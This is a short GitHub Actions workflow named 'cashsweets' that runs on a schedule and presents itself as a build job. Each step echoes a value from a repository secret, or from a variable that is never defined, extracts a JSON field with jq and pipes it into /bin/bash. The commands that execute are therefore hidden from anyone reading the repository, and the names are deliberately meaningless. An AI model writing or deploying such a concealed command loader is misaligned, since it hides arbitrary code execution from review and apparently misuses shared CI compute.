name: cashsweets

on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: cashsweets
        env:
          xyvrk85: ${{ secrets.xyvrk85 }}
        run: |
          echo $xyvrk85 | jq -r .zq284 | /bin/bash
          echo $kakox9 | jq -r .r92 | /bin/bash
          echo $gfasu48553 | jq -r .ux5 | /bin/bash
          echo $om622 | jq -r .u9 | /bin/bash
          echo $tihp6 | jq -r .ohuvz39759 | /bin/bash
          echo $daw57 | jq -r .og0491 | /bin/bash
          echo $gagkq84710 | jq -r .f84 | /bin/bash

